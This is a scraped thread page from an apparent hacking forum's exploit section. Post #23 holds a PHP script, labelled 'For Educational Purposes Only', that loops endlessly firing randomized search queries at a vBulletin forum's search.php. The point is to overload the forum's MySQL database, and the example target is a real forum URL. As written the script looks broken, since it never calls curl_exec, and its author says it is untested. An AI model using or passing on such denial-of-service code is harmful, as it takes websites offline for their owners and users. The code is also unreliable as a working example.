![]() |
|
|
|||||||
| Notices |

Register Now for FREE!
|
![]() |
|
|
LinkBack (2) | Thread Tools | Display Modes |
|
|
#21 (permalink) |
|
Member
![]() Join Date: Jun 2008
Location: Argentina
Posts: 97
Thanks: 6
Thanked 3 Times in 3 Posts
Rep Power: 23
![]() ![]() |
Thanks! Digi u are great!
__________________
To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts. To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts. To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts. To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts. |
|
|
|
|
|
#23 (permalink) |
|
Junior Member
![]() Join Date: Jul 2008
Posts: 1
Thanks: 0
Thanked 0 Times in 0 Posts
Rep Power: 0
![]() |
Is this a exploit, id describe it more of MYSQL DDOS.
I wrote a PHP version with CURL. Not Tested, but uses code I allways use, so should work. --------- For Educational Purposes Only: Code:
<?
function make_seed(){
list($usec, $sec) = explode(' ', microtime());
return (float) $sec + ((float) $usec * 100000);
}
function docurl($url){
$ch = curl_init();
curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE);
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_HEADER, FALSE);
curl_setopt($ch, CURLOPT_REFERER, "http://www.google.com");
ob_start();
ob_end_clean();
curl_close ($ch);
}
$forumurl = "http://www.hardforum.com/"; //Example http://www.hardforum.com/
$userprefix = "haxor"; //Any Username
$searchqerya = "search.php?s=&do=process&query=";
$searchqueryb = "&titleonly=0&starteronly=0&exactname=1&replyless=0&replylimit=3&searchdate =1&beforeafter=before&sortby=title&order=descending&showposts=1&forumchoice[]=0&childforums=1&dosearch=Search Now";
$i = 0;
while(1) {
srand(make_seed());
$randval = rand();
$url = $forumurl.$searchqerya.$userprefix.$randval.$searchqueryb;
docurl($url);
$i++;
echo $i.' ddosed<br>';
}
?>
(P.S. DONT TARGET MY FORUM!!! lol) |
|
|
|
![]() |
| Bookmarks |
LinkBacks (?)
LinkBack to this Thread: http://www.badhackerz.com/exploit-codes/10597-new-vbulletin-exploit-all-versions.html
|
||||
| Posted By | For | Type | Date | |
| Digg - New !! Vbulletin Exploit [All Versions] | This thread | Refback | 06-20-2008 08:03 AM | |
| Badhackerz... Ethical hackers - Powered by vBulletin | This thread | Refback | 06-17-2008 02:43 AM | |
| Currently Active Users Viewing This Thread: 1 (0 members and 1 guests) | |
| Thread Tools | |
| Display Modes | |
|
|
Similar Threads
|
||||
| Thread | Thread Starter | Forum | Replies | Last Post |
| vBulletin <= 3.7.0 XSS Exploit (ajax.php - ajaxReg mod) | Armageddon | Exploit Codes | 5 | 2 Weeks Ago 07:43 AM |
| Vbulletin Latest exploit not mine | RampageX11 | Exploit Codes | 8 | 11-09-2008 02:23 PM |
| The Egyptians {ALL VERSIONS} | Insurrection | Sony Ericsson File Downloads | 0 | 08-04-2008 02:09 PM |
| ibProArcade 2.x module (vBulletin/IPB) Remote SQL Injection Exploit | MaDHA¢KeR™ | Exploit Codes | 0 | 08-02-2008 03:16 PM |